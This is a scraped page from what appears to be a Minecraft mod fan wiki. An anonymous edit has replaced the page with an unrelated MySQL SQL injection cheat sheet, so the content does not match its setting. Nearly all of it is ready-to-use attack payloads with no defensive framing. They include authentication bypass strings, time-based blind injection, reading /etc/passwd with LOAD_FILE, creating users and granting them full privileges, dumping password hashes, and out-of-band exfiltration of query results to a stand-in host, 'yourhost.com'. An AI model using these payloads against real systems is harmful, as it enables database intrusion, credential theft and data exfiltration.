The Lord of the Rings Minecraft Mod Wiki
Don't have an account?
Register
Advertisement
Register
The Lord of the Rings Minecraft Mod Wiki
The Lord of the Rings Minecraft Mod Wiki
1,676
pages
in: Stubs

LotR Mod Instagram

Revision as of 14:34, 20 February 2017 by 152.26.91.83 (contribs) (sql slammer)
 Sign in to edit



MySQL SQL Injection Cheat Sheet

Initial Exploitation

Quick Detection

Blind SQL Injection (Time Based)

Line Comments

Inline Comments

If Statements

String without Quotes

Bulk Insert

Load File

Command Execution

Create Users

Drop Users

Make User DBA

List Users

List Passwords

List Databases

Privileges

Getting user defined tables

Getting Column Names

Default Databases

Path of DB files

Time Based SQLi Exploitation

Out of Band Channel

Initial Exploitation===Back to top===

Version   SELECT @@VERSION 
 SELECT version()
Current User  SELECT user()
 SELECT system_user()
Current Database  SELECT database()

Quick Detection===Back to top===

Error Based SQLi  For integer inputs:  (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

 For string inputs:

 '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

 The attacks above should throw 'duplicate entry' errors.

Clear SQLi Tests  These tests are simply good for boolean sql injection and silent attacks.  product.php?id=4
 product.php?id=5-1
 product.php?id=4 OR 1=1
 product.php?id=-1 OR 17-7=10

Blind SQL Injection (Time Based)===Back to top===

###   Use this when you can not see any difference at output. Second do not use more than 30 seconds, because database API connection timeout could be easily reached. 
###  This is just like sleep, wait for spesified time. CPU safe way to make database wait.  SLEEP(25)--
 SELECT BENCHMARK(1000000,MD5('A'));
Real World Samples  ProductID=1 OR SLEEP(25)=0 LIMIT 1--
 ProductID=1) OR SLEEP(25)=0 LIMIT 1--
 ProductID=1' OR SLEEP(25)=0 LIMIT 1--
 ProductID=1') OR SLEEP(25)=0 LIMIT 1--
 ProductID=1)) OR SLEEP(25)=0 LIMIT 1--
 ProductID=SELECT SLEEP(25)--

Line Comments===Back to top=== DROP sampletable;--DROP sampletable;# Username : admin'--                : admin' or '1'='1'-- SELECT * FROM members WHERE $username = 'admin'--' AND $password = 'password' This is going to log you as admin user, because rest of the SQL query will be ignored.

Inline Comments===Back to top=== Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.*DROP/*comment*/sampletable

  • DR/**/OP/*bypass blacklisting*/sampletable

If Statements===Back to top=== Get response based on a if statement. This is one of the key points of Blind SQL Injection, also can be very useful to test simple stuff blindly and accurately. MySQL If Statement *IF condition true-part ELSE false-part

  • SELECT IF (1=1, ‘true’, ‘false’)


If Statement SQL Injection Attack Samples SELECT IF(user()='root@localhost','true','false')

String without Quotes===Back to top=== SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) This will return ‘KLM’.

Bulk Insert===Back to top=== Insert a file content to a table. SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; --

Load File===Back to top=== ' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- SELECT LOAD_FILE(0x633A5C626F6F742E696E69)This will show the content of c:\boot.ini

Command Execution===Back to top=== Possible with using UDF (user defined functions). http://packetstormsecurity.org/libraries/lib_mysqludf_sys_0.0.3.tar.gz

Create Users===Back to top=== CREATE USER username IDENTIFIED BY password; --

Drop Users===Back to top=== DROP USER username; --

Make User DBA===Back to top=== GRANT ALL PRIVILEGES ON *.* TO username@'%';

List Users===Back to top===

  • SELECT * FROM 'user' WHERE 1 LIMIT 0,30
  • SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
  • SELECT * FROM mysql.user

List Passwords===Back to top===

  • SELECT user, password FROM mysql.user
  • SELECT user, password FROM mysql.user LIMIT 1,1
  • SELECT password FROM mysql.user WHERE user = 'root'

List Databases===Back to top===

  • SELECT schema_name FROM information_schema.schemata;
  • SELECT schema_name FROM information_schema.schemata LIMIT 1,1;

Privileges===Back to top===

  • SELECT Super_priv FROM mysql.user WHERE user=(SELECT user) LIMIT 1,1--
  • SELECT Super_priv FROM mysql.user WHERE user= ‘root’ LIMIT 1,1--

Getting user defined tables===Back to top=== SELECT table_name FROM information_schema.tables WHERE table_schema = tblUsers tblUsers -> tablename

Getting Column Names===Back to top=== SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = tblUsers tblUsers -> tablename SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = username; find table which have a column called 'username

Default Databases===Back to top===

  • information_schema (>= mysql 5.0)
  • mysql

Path of DB files===Back to top===

  • SELECT @@datadir
  • C:\AppServ\MySQL\data\

Time Based SQLi Exploitation===Back to top=== ?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTON}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1-- {INJECTION} = You want to run the query. If the condition is true, will response after 14 seconds. If is false, will be delayed for one second.

Out of Band Channel===Back to top=== ?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\'))) Makes a NBNS query request/DNS resolution request to yourhost.com ?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\\share\\output.txt') Writes data to your shared folder/file {INJECTION} = You want to run the query.

[1]  

Community content is available under CC-BY-SA unless otherwise noted.
More Fandoms
Advertisement

Fan Feed

More The Lord of the Rings Minecraft Mod Wiki